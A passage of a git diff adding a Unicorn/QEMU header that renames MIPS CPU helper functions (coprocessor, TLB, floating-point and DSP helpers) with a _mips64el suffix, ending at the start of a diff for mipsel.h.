helper_mttc0_tcbind helper_mttc0_tcbind_mips64el +#define helper_mtc0_tcrestart helper_mtc0_tcrestart_mips64el +#define helper_mttc0_tcrestart helper_mttc0_tcrestart_mips64el +#define helper_mtc0_tchalt helper_mtc0_tchalt_mips64el +#define helper_mttc0_tchalt helper_mttc0_tchalt_mips64el +#define helper_mtc0_tccontext helper_mtc0_tccontext_mips64el +#define helper_mttc0_tccontext helper_mttc0_tccontext_mips64el +#define helper_mtc0_tcschedule helper_mtc0_tcschedule_mips64el +#define helper_mttc0_tcschedule helper_mttc0_tcschedule_mips64el +#define helper_mtc0_tcschefback helper_mtc0_tcschefback_mips64el +#define helper_mttc0_tcschefback helper_mttc0_tcschefback_mips64el +#define helper_mtc0_entrylo1 helper_mtc0_entrylo1_mips64el +#define helper_mtc0_context helper_mtc0_context_mips64el +#define helper_mtc0_pagemask helper_mtc0_pagemask_mips64el +#define helper_mtc0_pagegrain helper_mtc0_pagegrain_mips64el +#define helper_mtc0_wired helper_mtc0_wired_mips64el +#define helper_mtc0_srsconf0 helper_mtc0_srsconf0_mips64el +#define helper_mtc0_srsconf1 helper_mtc0_srsconf1_mips64el +#define helper_mtc0_srsconf2 helper_mtc0_srsconf2_mips64el +#define helper_mtc0_srsconf3 helper_mtc0_srsconf3_mips64el +#define helper_mtc0_srsconf4 helper_mtc0_srsconf4_mips64el +#define helper_mtc0_hwrena helper_mtc0_hwrena_mips64el +#define helper_mtc0_count helper_mtc0_count_mips64el +#define helper_mtc0_entryhi helper_mtc0_entryhi_mips64el +#define helper_mttc0_entryhi helper_mttc0_entryhi_mips64el +#define helper_mtc0_compare helper_mtc0_compare_mips64el +#define helper_mtc0_status helper_mtc0_status_mips64el +#define helper_mttc0_status helper_mttc0_status_mips64el +#define helper_mtc0_intctl helper_mtc0_intctl_mips64el +#define helper_mtc0_srsctl helper_mtc0_srsctl_mips64el +#define helper_mtc0_cause helper_mtc0_cause_mips64el +#define helper_mttc0_cause helper_mttc0_cause_mips64el +#define helper_mftc0_epc helper_mftc0_epc_mips64el +#define helper_mftc0_ebase 
helper_mftc0_ebase_mips64el +#define helper_mtc0_ebase helper_mtc0_ebase_mips64el +#define helper_mttc0_ebase helper_mttc0_ebase_mips64el +#define helper_mftc0_configx helper_mftc0_configx_mips64el +#define helper_mtc0_config0 helper_mtc0_config0_mips64el +#define helper_mtc0_config2 helper_mtc0_config2_mips64el +#define helper_mtc0_config4 helper_mtc0_config4_mips64el +#define helper_mtc0_config5 helper_mtc0_config5_mips64el +#define helper_mtc0_lladdr helper_mtc0_lladdr_mips64el +#define helper_mtc0_watchlo helper_mtc0_watchlo_mips64el +#define helper_mtc0_watchhi helper_mtc0_watchhi_mips64el +#define helper_mtc0_xcontext helper_mtc0_xcontext_mips64el +#define helper_mtc0_framemask helper_mtc0_framemask_mips64el +#define helper_mtc0_debug helper_mtc0_debug_mips64el +#define helper_mttc0_debug helper_mttc0_debug_mips64el +#define helper_mtc0_performance0 helper_mtc0_performance0_mips64el +#define helper_mtc0_taglo helper_mtc0_taglo_mips64el +#define helper_mtc0_datalo helper_mtc0_datalo_mips64el +#define helper_mtc0_taghi helper_mtc0_taghi_mips64el +#define helper_mtc0_datahi helper_mtc0_datahi_mips64el +#define helper_mftgpr helper_mftgpr_mips64el +#define helper_mftlo helper_mftlo_mips64el +#define helper_mfthi helper_mfthi_mips64el +#define helper_mftacx helper_mftacx_mips64el +#define helper_mftdsp helper_mftdsp_mips64el +#define helper_mttgpr helper_mttgpr_mips64el +#define helper_mttlo helper_mttlo_mips64el +#define helper_mtthi helper_mtthi_mips64el +#define helper_mttacx helper_mttacx_mips64el +#define helper_mttdsp helper_mttdsp_mips64el +#define helper_dmt helper_dmt_mips64el +#define helper_emt helper_emt_mips64el +#define helper_dvpe helper_dvpe_mips64el +#define helper_evpe helper_evpe_mips64el +#define helper_fork helper_fork_mips64el +#define helper_yield helper_yield_mips64el +#define r4k_helper_tlbinv r4k_helper_tlbinv_mips64el +#define r4k_helper_tlbinvf r4k_helper_tlbinvf_mips64el +#define r4k_helper_tlbwi r4k_helper_tlbwi_mips64el +#define 
r4k_helper_tlbwr r4k_helper_tlbwr_mips64el +#define r4k_helper_tlbp r4k_helper_tlbp_mips64el +#define r4k_helper_tlbr r4k_helper_tlbr_mips64el +#define helper_tlbwi helper_tlbwi_mips64el +#define helper_tlbwr helper_tlbwr_mips64el +#define helper_tlbp helper_tlbp_mips64el +#define helper_tlbr helper_tlbr_mips64el +#define helper_tlbinv helper_tlbinv_mips64el +#define helper_tlbinvf helper_tlbinvf_mips64el +#define helper_di helper_di_mips64el +#define helper_ei helper_ei_mips64el +#define helper_eret helper_eret_mips64el +#define helper_deret helper_deret_mips64el +#define helper_rdhwr_cpunum helper_rdhwr_cpunum_mips64el +#define helper_rdhwr_synci_step helper_rdhwr_synci_step_mips64el +#define helper_rdhwr_cc helper_rdhwr_cc_mips64el +#define helper_rdhwr_ccres helper_rdhwr_ccres_mips64el +#define helper_pmon helper_pmon_mips64el +#define helper_wait helper_wait_mips64el +#define mips_cpu_do_unaligned_access mips_cpu_do_unaligned_access_mips64el +#define mips_cpu_unassigned_access mips_cpu_unassigned_access_mips64el +#define ieee_rm ieee_rm_mips64el +#define helper_cfc1 helper_cfc1_mips64el +#define helper_ctc1 helper_ctc1_mips64el +#define ieee_ex_to_mips ieee_ex_to_mips_mips64el +#define helper_float_sqrt_d helper_float_sqrt_d_mips64el +#define helper_float_sqrt_s helper_float_sqrt_s_mips64el +#define helper_float_cvtd_s helper_float_cvtd_s_mips64el +#define helper_float_cvtd_w helper_float_cvtd_w_mips64el +#define helper_float_cvtd_l helper_float_cvtd_l_mips64el +#define helper_float_cvtl_d helper_float_cvtl_d_mips64el +#define helper_float_cvtl_s helper_float_cvtl_s_mips64el +#define helper_float_cvtps_pw helper_float_cvtps_pw_mips64el +#define helper_float_cvtpw_ps helper_float_cvtpw_ps_mips64el +#define helper_float_cvts_d helper_float_cvts_d_mips64el +#define helper_float_cvts_w helper_float_cvts_w_mips64el +#define helper_float_cvts_l helper_float_cvts_l_mips64el +#define helper_float_cvts_pl helper_float_cvts_pl_mips64el +#define helper_float_cvts_pu 
helper_float_cvts_pu_mips64el +#define helper_float_cvtw_s helper_float_cvtw_s_mips64el +#define helper_float_cvtw_d helper_float_cvtw_d_mips64el +#define helper_float_roundl_d helper_float_roundl_d_mips64el +#define helper_float_roundl_s helper_float_roundl_s_mips64el +#define helper_float_roundw_d helper_float_roundw_d_mips64el +#define helper_float_roundw_s helper_float_roundw_s_mips64el +#define helper_float_truncl_d helper_float_truncl_d_mips64el +#define helper_float_truncl_s helper_float_truncl_s_mips64el +#define helper_float_truncw_d helper_float_truncw_d_mips64el +#define helper_float_truncw_s helper_float_truncw_s_mips64el +#define helper_float_ceill_d helper_float_ceill_d_mips64el +#define helper_float_ceill_s helper_float_ceill_s_mips64el +#define helper_float_ceilw_d helper_float_ceilw_d_mips64el +#define helper_float_ceilw_s helper_float_ceilw_s_mips64el +#define helper_float_floorl_d helper_float_floorl_d_mips64el +#define helper_float_floorl_s helper_float_floorl_s_mips64el +#define helper_float_floorw_d helper_float_floorw_d_mips64el +#define helper_float_floorw_s helper_float_floorw_s_mips64el +#define helper_float_abs_d helper_float_abs_d_mips64el +#define helper_float_abs_s helper_float_abs_s_mips64el +#define helper_float_abs_ps helper_float_abs_ps_mips64el +#define helper_float_chs_d helper_float_chs_d_mips64el +#define helper_float_chs_s helper_float_chs_s_mips64el +#define helper_float_chs_ps helper_float_chs_ps_mips64el +#define helper_float_maddf_s helper_float_maddf_s_mips64el +#define helper_float_maddf_d helper_float_maddf_d_mips64el +#define helper_float_msubf_s helper_float_msubf_s_mips64el +#define helper_float_msubf_d helper_float_msubf_d_mips64el +#define helper_float_max_s helper_float_max_s_mips64el +#define helper_float_max_d helper_float_max_d_mips64el +#define helper_float_maxa_s helper_float_maxa_s_mips64el +#define helper_float_maxa_d helper_float_maxa_d_mips64el +#define helper_float_min_s helper_float_min_s_mips64el 
+#define helper_float_min_d helper_float_min_d_mips64el +#define helper_float_mina_s helper_float_mina_s_mips64el +#define helper_float_mina_d helper_float_mina_d_mips64el +#define helper_float_rint_s helper_float_rint_s_mips64el +#define helper_float_rint_d helper_float_rint_d_mips64el +#define helper_float_class_s helper_float_class_s_mips64el +#define helper_float_class_d helper_float_class_d_mips64el +#define helper_float_recip_d helper_float_recip_d_mips64el +#define helper_float_recip_s helper_float_recip_s_mips64el +#define helper_float_rsqrt_d helper_float_rsqrt_d_mips64el +#define helper_float_rsqrt_s helper_float_rsqrt_s_mips64el +#define helper_float_recip1_d helper_float_recip1_d_mips64el +#define helper_float_recip1_s helper_float_recip1_s_mips64el +#define helper_float_recip1_ps helper_float_recip1_ps_mips64el +#define helper_float_rsqrt1_d helper_float_rsqrt1_d_mips64el +#define helper_float_rsqrt1_s helper_float_rsqrt1_s_mips64el +#define helper_float_rsqrt1_ps helper_float_rsqrt1_ps_mips64el +#define helper_float_add_d helper_float_add_d_mips64el +#define helper_float_add_s helper_float_add_s_mips64el +#define helper_float_add_ps helper_float_add_ps_mips64el +#define helper_float_sub_d helper_float_sub_d_mips64el +#define helper_float_sub_s helper_float_sub_s_mips64el +#define helper_float_sub_ps helper_float_sub_ps_mips64el +#define helper_float_mul_d helper_float_mul_d_mips64el +#define helper_float_mul_s helper_float_mul_s_mips64el +#define helper_float_mul_ps helper_float_mul_ps_mips64el +#define helper_float_div_d helper_float_div_d_mips64el +#define helper_float_div_s helper_float_div_s_mips64el +#define helper_float_div_ps helper_float_div_ps_mips64el +#define helper_float_madd_d helper_float_madd_d_mips64el +#define helper_float_madd_s helper_float_madd_s_mips64el +#define helper_float_madd_ps helper_float_madd_ps_mips64el +#define helper_float_msub_d helper_float_msub_d_mips64el +#define helper_float_msub_s helper_float_msub_s_mips64el 
+#define helper_float_msub_ps helper_float_msub_ps_mips64el +#define helper_float_nmadd_d helper_float_nmadd_d_mips64el +#define helper_float_nmadd_s helper_float_nmadd_s_mips64el +#define helper_float_nmadd_ps helper_float_nmadd_ps_mips64el +#define helper_float_nmsub_d helper_float_nmsub_d_mips64el +#define helper_float_nmsub_s helper_float_nmsub_s_mips64el +#define helper_float_nmsub_ps helper_float_nmsub_ps_mips64el +#define helper_float_recip2_d helper_float_recip2_d_mips64el +#define helper_float_recip2_s helper_float_recip2_s_mips64el +#define helper_float_recip2_ps helper_float_recip2_ps_mips64el +#define helper_float_rsqrt2_d helper_float_rsqrt2_d_mips64el +#define helper_float_rsqrt2_s helper_float_rsqrt2_s_mips64el +#define helper_float_rsqrt2_ps helper_float_rsqrt2_ps_mips64el +#define helper_float_addr_ps helper_float_addr_ps_mips64el +#define helper_float_mulr_ps helper_float_mulr_ps_mips64el +#define helper_cmp_d_f helper_cmp_d_f_mips64el +#define helper_cmpabs_d_f helper_cmpabs_d_f_mips64el +#define helper_cmp_d_un helper_cmp_d_un_mips64el +#define helper_cmpabs_d_un helper_cmpabs_d_un_mips64el +#define helper_cmp_d_eq helper_cmp_d_eq_mips64el +#define helper_cmpabs_d_eq helper_cmpabs_d_eq_mips64el +#define helper_cmp_d_ueq helper_cmp_d_ueq_mips64el +#define helper_cmpabs_d_ueq helper_cmpabs_d_ueq_mips64el +#define helper_cmp_d_olt helper_cmp_d_olt_mips64el +#define helper_cmpabs_d_olt helper_cmpabs_d_olt_mips64el +#define helper_cmp_d_ult helper_cmp_d_ult_mips64el +#define helper_cmpabs_d_ult helper_cmpabs_d_ult_mips64el +#define helper_cmp_d_ole helper_cmp_d_ole_mips64el +#define helper_cmpabs_d_ole helper_cmpabs_d_ole_mips64el +#define helper_cmp_d_ule helper_cmp_d_ule_mips64el +#define helper_cmpabs_d_ule helper_cmpabs_d_ule_mips64el +#define helper_cmp_d_sf helper_cmp_d_sf_mips64el +#define helper_cmpabs_d_sf helper_cmpabs_d_sf_mips64el +#define helper_cmp_d_ngle helper_cmp_d_ngle_mips64el +#define helper_cmpabs_d_ngle 
helper_cmpabs_d_ngle_mips64el +#define helper_cmp_d_seq helper_cmp_d_seq_mips64el +#define helper_cmpabs_d_seq helper_cmpabs_d_seq_mips64el +#define helper_cmp_d_ngl helper_cmp_d_ngl_mips64el +#define helper_cmpabs_d_ngl helper_cmpabs_d_ngl_mips64el +#define helper_cmp_d_lt helper_cmp_d_lt_mips64el +#define helper_cmpabs_d_lt helper_cmpabs_d_lt_mips64el +#define helper_cmp_d_nge helper_cmp_d_nge_mips64el +#define helper_cmpabs_d_nge helper_cmpabs_d_nge_mips64el +#define helper_cmp_d_le helper_cmp_d_le_mips64el +#define helper_cmpabs_d_le helper_cmpabs_d_le_mips64el +#define helper_cmp_d_ngt helper_cmp_d_ngt_mips64el +#define helper_cmpabs_d_ngt helper_cmpabs_d_ngt_mips64el +#define helper_cmp_s_f helper_cmp_s_f_mips64el +#define helper_cmpabs_s_f helper_cmpabs_s_f_mips64el +#define helper_cmp_s_un helper_cmp_s_un_mips64el +#define helper_cmpabs_s_un helper_cmpabs_s_un_mips64el +#define helper_cmp_s_eq helper_cmp_s_eq_mips64el +#define helper_cmpabs_s_eq helper_cmpabs_s_eq_mips64el +#define helper_cmp_s_ueq helper_cmp_s_ueq_mips64el +#define helper_cmpabs_s_ueq helper_cmpabs_s_ueq_mips64el +#define helper_cmp_s_olt helper_cmp_s_olt_mips64el +#define helper_cmpabs_s_olt helper_cmpabs_s_olt_mips64el +#define helper_cmp_s_ult helper_cmp_s_ult_mips64el +#define helper_cmpabs_s_ult helper_cmpabs_s_ult_mips64el +#define helper_cmp_s_ole helper_cmp_s_ole_mips64el +#define helper_cmpabs_s_ole helper_cmpabs_s_ole_mips64el +#define helper_cmp_s_ule helper_cmp_s_ule_mips64el +#define helper_cmpabs_s_ule helper_cmpabs_s_ule_mips64el +#define helper_cmp_s_sf helper_cmp_s_sf_mips64el +#define helper_cmpabs_s_sf helper_cmpabs_s_sf_mips64el +#define helper_cmp_s_ngle helper_cmp_s_ngle_mips64el +#define helper_cmpabs_s_ngle helper_cmpabs_s_ngle_mips64el +#define helper_cmp_s_seq helper_cmp_s_seq_mips64el +#define helper_cmpabs_s_seq helper_cmpabs_s_seq_mips64el +#define helper_cmp_s_ngl helper_cmp_s_ngl_mips64el +#define helper_cmpabs_s_ngl helper_cmpabs_s_ngl_mips64el +#define 
helper_cmp_s_lt helper_cmp_s_lt_mips64el +#define helper_cmpabs_s_lt helper_cmpabs_s_lt_mips64el +#define helper_cmp_s_nge helper_cmp_s_nge_mips64el +#define helper_cmpabs_s_nge helper_cmpabs_s_nge_mips64el +#define helper_cmp_s_le helper_cmp_s_le_mips64el +#define helper_cmpabs_s_le helper_cmpabs_s_le_mips64el +#define helper_cmp_s_ngt helper_cmp_s_ngt_mips64el +#define helper_cmpabs_s_ngt helper_cmpabs_s_ngt_mips64el +#define helper_cmp_ps_f helper_cmp_ps_f_mips64el +#define helper_cmpabs_ps_f helper_cmpabs_ps_f_mips64el +#define helper_cmp_ps_un helper_cmp_ps_un_mips64el +#define helper_cmpabs_ps_un helper_cmpabs_ps_un_mips64el +#define helper_cmp_ps_eq helper_cmp_ps_eq_mips64el +#define helper_cmpabs_ps_eq helper_cmpabs_ps_eq_mips64el +#define helper_cmp_ps_ueq helper_cmp_ps_ueq_mips64el +#define helper_cmpabs_ps_ueq helper_cmpabs_ps_ueq_mips64el +#define helper_cmp_ps_olt helper_cmp_ps_olt_mips64el +#define helper_cmpabs_ps_olt helper_cmpabs_ps_olt_mips64el +#define helper_cmp_ps_ult helper_cmp_ps_ult_mips64el +#define helper_cmpabs_ps_ult helper_cmpabs_ps_ult_mips64el +#define helper_cmp_ps_ole helper_cmp_ps_ole_mips64el +#define helper_cmpabs_ps_ole helper_cmpabs_ps_ole_mips64el +#define helper_cmp_ps_ule helper_cmp_ps_ule_mips64el +#define helper_cmpabs_ps_ule helper_cmpabs_ps_ule_mips64el +#define helper_cmp_ps_sf helper_cmp_ps_sf_mips64el +#define helper_cmpabs_ps_sf helper_cmpabs_ps_sf_mips64el +#define helper_cmp_ps_ngle helper_cmp_ps_ngle_mips64el +#define helper_cmpabs_ps_ngle helper_cmpabs_ps_ngle_mips64el +#define helper_cmp_ps_seq helper_cmp_ps_seq_mips64el +#define helper_cmpabs_ps_seq helper_cmpabs_ps_seq_mips64el +#define helper_cmp_ps_ngl helper_cmp_ps_ngl_mips64el +#define helper_cmpabs_ps_ngl helper_cmpabs_ps_ngl_mips64el +#define helper_cmp_ps_lt helper_cmp_ps_lt_mips64el +#define helper_cmpabs_ps_lt helper_cmpabs_ps_lt_mips64el +#define helper_cmp_ps_nge helper_cmp_ps_nge_mips64el +#define helper_cmpabs_ps_nge helper_cmpabs_ps_nge_mips64el 
+#define helper_cmp_ps_le helper_cmp_ps_le_mips64el +#define helper_cmpabs_ps_le helper_cmpabs_ps_le_mips64el +#define helper_cmp_ps_ngt helper_cmp_ps_ngt_mips64el +#define helper_cmpabs_ps_ngt helper_cmpabs_ps_ngt_mips64el +#define helper_r6_cmp_d_af helper_r6_cmp_d_af_mips64el +#define helper_r6_cmp_d_un helper_r6_cmp_d_un_mips64el +#define helper_r6_cmp_d_eq helper_r6_cmp_d_eq_mips64el +#define helper_r6_cmp_d_ueq helper_r6_cmp_d_ueq_mips64el +#define helper_r6_cmp_d_lt helper_r6_cmp_d_lt_mips64el +#define helper_r6_cmp_d_ult helper_r6_cmp_d_ult_mips64el +#define helper_r6_cmp_d_le helper_r6_cmp_d_le_mips64el +#define helper_r6_cmp_d_ule helper_r6_cmp_d_ule_mips64el +#define helper_r6_cmp_d_saf helper_r6_cmp_d_saf_mips64el +#define helper_r6_cmp_d_sun helper_r6_cmp_d_sun_mips64el +#define helper_r6_cmp_d_seq helper_r6_cmp_d_seq_mips64el +#define helper_r6_cmp_d_sueq helper_r6_cmp_d_sueq_mips64el +#define helper_r6_cmp_d_slt helper_r6_cmp_d_slt_mips64el +#define helper_r6_cmp_d_sult helper_r6_cmp_d_sult_mips64el +#define helper_r6_cmp_d_sle helper_r6_cmp_d_sle_mips64el +#define helper_r6_cmp_d_sule helper_r6_cmp_d_sule_mips64el +#define helper_r6_cmp_d_or helper_r6_cmp_d_or_mips64el +#define helper_r6_cmp_d_une helper_r6_cmp_d_une_mips64el +#define helper_r6_cmp_d_ne helper_r6_cmp_d_ne_mips64el +#define helper_r6_cmp_d_sor helper_r6_cmp_d_sor_mips64el +#define helper_r6_cmp_d_sune helper_r6_cmp_d_sune_mips64el +#define helper_r6_cmp_d_sne helper_r6_cmp_d_sne_mips64el +#define helper_r6_cmp_s_af helper_r6_cmp_s_af_mips64el +#define helper_r6_cmp_s_un helper_r6_cmp_s_un_mips64el +#define helper_r6_cmp_s_eq helper_r6_cmp_s_eq_mips64el +#define helper_r6_cmp_s_ueq helper_r6_cmp_s_ueq_mips64el +#define helper_r6_cmp_s_lt helper_r6_cmp_s_lt_mips64el +#define helper_r6_cmp_s_ult helper_r6_cmp_s_ult_mips64el +#define helper_r6_cmp_s_le helper_r6_cmp_s_le_mips64el +#define helper_r6_cmp_s_ule helper_r6_cmp_s_ule_mips64el +#define helper_r6_cmp_s_saf 
helper_r6_cmp_s_saf_mips64el +#define helper_r6_cmp_s_sun helper_r6_cmp_s_sun_mips64el +#define helper_r6_cmp_s_seq helper_r6_cmp_s_seq_mips64el +#define helper_r6_cmp_s_sueq helper_r6_cmp_s_sueq_mips64el +#define helper_r6_cmp_s_slt helper_r6_cmp_s_slt_mips64el +#define helper_r6_cmp_s_sult helper_r6_cmp_s_sult_mips64el +#define helper_r6_cmp_s_sle helper_r6_cmp_s_sle_mips64el +#define helper_r6_cmp_s_sule helper_r6_cmp_s_sule_mips64el +#define helper_r6_cmp_s_or helper_r6_cmp_s_or_mips64el +#define helper_r6_cmp_s_une helper_r6_cmp_s_une_mips64el +#define helper_r6_cmp_s_ne helper_r6_cmp_s_ne_mips64el +#define helper_r6_cmp_s_sor helper_r6_cmp_s_sor_mips64el +#define helper_r6_cmp_s_sune helper_r6_cmp_s_sune_mips64el +#define helper_r6_cmp_s_sne helper_r6_cmp_s_sne_mips64el +#define helper_msa_ld_df helper_msa_ld_df_mips64el +#define helper_msa_st_df helper_msa_st_df_mips64el +#define no_mmu_map_address no_mmu_map_address_mips64el +#define fixed_mmu_map_address fixed_mmu_map_address_mips64el +#define r4k_map_address r4k_map_address_mips64el +#define mips_cpu_get_phys_page_debug mips_cpu_get_phys_page_debug_mips64el +#define mips_cpu_handle_mmu_fault mips_cpu_handle_mmu_fault_mips64el +#define cpu_mips_translate_address cpu_mips_translate_address_mips64el +#define exception_resume_pc exception_resume_pc_mips64el +#define mips_cpu_do_interrupt mips_cpu_do_interrupt_mips64el +#define mips_cpu_exec_interrupt mips_cpu_exec_interrupt_mips64el +#define r4k_invalidate_tlb r4k_invalidate_tlb_mips64el +#define helper_absq_s_ob helper_absq_s_ob_mips64el +#define helper_absq_s_qh helper_absq_s_qh_mips64el +#define helper_absq_s_pw helper_absq_s_pw_mips64el +#define helper_adduh_ob helper_adduh_ob_mips64el +#define helper_adduh_r_ob helper_adduh_r_ob_mips64el +#define helper_subuh_ob helper_subuh_ob_mips64el +#define helper_subuh_r_ob helper_subuh_r_ob_mips64el +#define helper_addq_pw helper_addq_pw_mips64el +#define helper_addq_qh helper_addq_qh_mips64el +#define 
helper_addq_s_pw helper_addq_s_pw_mips64el +#define helper_addq_s_qh helper_addq_s_qh_mips64el +#define helper_addu_ob helper_addu_ob_mips64el +#define helper_addu_qh helper_addu_qh_mips64el +#define helper_addu_s_ob helper_addu_s_ob_mips64el +#define helper_addu_s_qh helper_addu_s_qh_mips64el +#define helper_subq_pw helper_subq_pw_mips64el +#define helper_subq_qh helper_subq_qh_mips64el +#define helper_subq_s_pw helper_subq_s_pw_mips64el +#define helper_subq_s_qh helper_subq_s_qh_mips64el +#define helper_subu_ob helper_subu_ob_mips64el +#define helper_subu_qh helper_subu_qh_mips64el +#define helper_subu_s_ob helper_subu_s_ob_mips64el +#define helper_subu_s_qh helper_subu_s_qh_mips64el +#define helper_raddu_l_ob helper_raddu_l_ob_mips64el +#define helper_precr_ob_qh helper_precr_ob_qh_mips64el +#define helper_precr_sra_qh_pw helper_precr_sra_qh_pw_mips64el +#define helper_precr_sra_r_qh_pw helper_precr_sra_r_qh_pw_mips64el +#define helper_precrq_ob_qh helper_precrq_ob_qh_mips64el +#define helper_precrq_qh_pw helper_precrq_qh_pw_mips64el +#define helper_precrq_rs_qh_pw helper_precrq_rs_qh_pw_mips64el +#define helper_precrq_pw_l helper_precrq_pw_l_mips64el +#define helper_precrqu_s_ob_qh helper_precrqu_s_ob_qh_mips64el +#define helper_preceq_pw_qhl helper_preceq_pw_qhl_mips64el +#define helper_preceq_pw_qhr helper_preceq_pw_qhr_mips64el +#define helper_preceq_pw_qhla helper_preceq_pw_qhla_mips64el +#define helper_preceq_pw_qhra helper_preceq_pw_qhra_mips64el +#define helper_precequ_qh_obl helper_precequ_qh_obl_mips64el +#define helper_precequ_qh_obr helper_precequ_qh_obr_mips64el +#define helper_precequ_qh_obla helper_precequ_qh_obla_mips64el +#define helper_precequ_qh_obra helper_precequ_qh_obra_mips64el +#define helper_preceu_qh_obl helper_preceu_qh_obl_mips64el +#define helper_preceu_qh_obr helper_preceu_qh_obr_mips64el +#define helper_preceu_qh_obla helper_preceu_qh_obla_mips64el +#define helper_preceu_qh_obra helper_preceu_qh_obra_mips64el +#define 
helper_shll_ob helper_shll_ob_mips64el +#define helper_shrl_ob helper_shrl_ob_mips64el +#define helper_shra_ob helper_shra_ob_mips64el +#define helper_shra_r_ob helper_shra_r_ob_mips64el +#define helper_shll_qh helper_shll_qh_mips64el +#define helper_shll_s_qh helper_shll_s_qh_mips64el +#define helper_shrl_qh helper_shrl_qh_mips64el +#define helper_shra_qh helper_shra_qh_mips64el +#define helper_shra_r_qh helper_shra_r_qh_mips64el +#define helper_shll_pw helper_shll_pw_mips64el +#define helper_shll_s_pw helper_shll_s_pw_mips64el +#define helper_shra_pw helper_shra_pw_mips64el +#define helper_shra_r_pw helper_shra_r_pw_mips64el +#define helper_muleu_s_qh_obl helper_muleu_s_qh_obl_mips64el +#define helper_muleu_s_qh_obr helper_muleu_s_qh_obr_mips64el +#define helper_mulq_rs_qh helper_mulq_rs_qh_mips64el +#define helper_muleq_s_pw_qhl helper_muleq_s_pw_qhl_mips64el +#define helper_muleq_s_pw_qhr helper_muleq_s_pw_qhr_mips64el +#define helper_mulsaq_s_w_qh helper_mulsaq_s_w_qh_mips64el +#define helper_dpau_h_obl helper_dpau_h_obl_mips64el +#define helper_dpau_h_obr helper_dpau_h_obr_mips64el +#define helper_dpsu_h_obl helper_dpsu_h_obl_mips64el +#define helper_dpsu_h_obr helper_dpsu_h_obr_mips64el +#define helper_dpa_w_qh helper_dpa_w_qh_mips64el +#define helper_dpaq_s_w_qh helper_dpaq_s_w_qh_mips64el +#define helper_dps_w_qh helper_dps_w_qh_mips64el +#define helper_dpsq_s_w_qh helper_dpsq_s_w_qh_mips64el +#define helper_dpaq_sa_l_pw helper_dpaq_sa_l_pw_mips64el +#define helper_dpsq_sa_l_pw helper_dpsq_sa_l_pw_mips64el +#define helper_mulsaq_s_l_pw helper_mulsaq_s_l_pw_mips64el +#define helper_maq_s_w_qhll helper_maq_s_w_qhll_mips64el +#define helper_maq_s_w_qhlr helper_maq_s_w_qhlr_mips64el +#define helper_maq_s_w_qhrl helper_maq_s_w_qhrl_mips64el +#define helper_maq_s_w_qhrr helper_maq_s_w_qhrr_mips64el +#define helper_maq_sa_w_qhll helper_maq_sa_w_qhll_mips64el +#define helper_maq_sa_w_qhlr helper_maq_sa_w_qhlr_mips64el +#define helper_maq_sa_w_qhrl 
helper_maq_sa_w_qhrl_mips64el +#define helper_maq_sa_w_qhrr helper_maq_sa_w_qhrr_mips64el +#define helper_maq_s_l_pwl helper_maq_s_l_pwl_mips64el +#define helper_maq_s_l_pwr helper_maq_s_l_pwr_mips64el +#define helper_dmadd helper_dmadd_mips64el +#define helper_dmaddu helper_dmaddu_mips64el +#define helper_dmsub helper_dmsub_mips64el +#define helper_dmsubu helper_dmsubu_mips64el +#define helper_dinsv helper_dinsv_mips64el +#define helper_cmpgu_eq_ob helper_cmpgu_eq_ob_mips64el +#define helper_cmpgu_lt_ob helper_cmpgu_lt_ob_mips64el +#define helper_cmpgu_le_ob helper_cmpgu_le_ob_mips64el +#define helper_cmpu_eq_ob helper_cmpu_eq_ob_mips64el +#define helper_cmpu_lt_ob helper_cmpu_lt_ob_mips64el +#define helper_cmpu_le_ob helper_cmpu_le_ob_mips64el +#define helper_cmp_eq_qh helper_cmp_eq_qh_mips64el +#define helper_cmp_lt_qh helper_cmp_lt_qh_mips64el +#define helper_cmp_le_qh helper_cmp_le_qh_mips64el +#define helper_cmp_eq_pw helper_cmp_eq_pw_mips64el +#define helper_cmp_lt_pw helper_cmp_lt_pw_mips64el +#define helper_cmp_le_pw helper_cmp_le_pw_mips64el +#define helper_cmpgdu_eq_ob helper_cmpgdu_eq_ob_mips64el +#define helper_cmpgdu_lt_ob helper_cmpgdu_lt_ob_mips64el +#define helper_cmpgdu_le_ob helper_cmpgdu_le_ob_mips64el +#define helper_pick_ob helper_pick_ob_mips64el +#define helper_pick_qh helper_pick_qh_mips64el +#define helper_pick_pw helper_pick_pw_mips64el +#define helper_packrl_pw helper_packrl_pw_mips64el +#define helper_dextr_w helper_dextr_w_mips64el +#define helper_dextr_r_w helper_dextr_r_w_mips64el +#define helper_dextr_rs_w helper_dextr_rs_w_mips64el +#define helper_dextr_l helper_dextr_l_mips64el +#define helper_dextr_r_l helper_dextr_r_l_mips64el +#define helper_dextr_rs_l helper_dextr_rs_l_mips64el +#define helper_dextr_s_h helper_dextr_s_h_mips64el +#define helper_dextp helper_dextp_mips64el +#define helper_dextpdp helper_dextpdp_mips64el +#define helper_dshilo helper_dshilo_mips64el +#define helper_dmthlip helper_dmthlip_mips64el +#define 
helper_dclo helper_dclo_mips64el +#define helper_dclz helper_dclz_mips64el +#define helper_dbitswap helper_dbitswap_mips64el +#define helper_lld helper_lld_mips64el +#define helper_scd helper_scd_mips64el +#define helper_sdl helper_sdl_mips64el +#define helper_sdr helper_sdr_mips64el +#define helper_ldm helper_ldm_mips64el +#define helper_sdm helper_sdm_mips64el +#define helper_dmfc0_tcrestart helper_dmfc0_tcrestart_mips64el +#define helper_dmfc0_tchalt helper_dmfc0_tchalt_mips64el +#define helper_dmfc0_tccontext helper_dmfc0_tccontext_mips64el +#define helper_dmfc0_tcschedule helper_dmfc0_tcschedule_mips64el +#define helper_dmfc0_tcschefback helper_dmfc0_tcschefback_mips64el +#define helper_dmfc0_lladdr helper_dmfc0_lladdr_mips64el +#define helper_dmfc0_watchlo helper_dmfc0_watchlo_mips64el +#define helper_dmtc0_entrylo0 helper_dmtc0_entrylo0_mips64el +#define helper_dmtc0_entrylo1 helper_dmtc0_entrylo1_mips64el +#define mips_reg_reset mips_reg_reset_mips64el +#define mips_reg_read mips_reg_read_mips64el +#define mips_reg_write mips_reg_write_mips64el +#define mips_tcg_init mips_tcg_init_mips64el +#define mips_cpu_list mips_cpu_list_mips64el +#define mips_release mips_release_mips64el +#define MIPS64_REGS_STORAGE_SIZE MIPS64_REGS_STORAGE_SIZE_mips64el +#define MIPS_REGS_STORAGE_SIZE MIPS_REGS_STORAGE_SIZE_mips64el +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/mipsel.h b/ai_anti_malware/unicorn/unicorn-master/qemu/mipsel.h new file mode 100644 index 0000000..a04123e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/mipsel.h 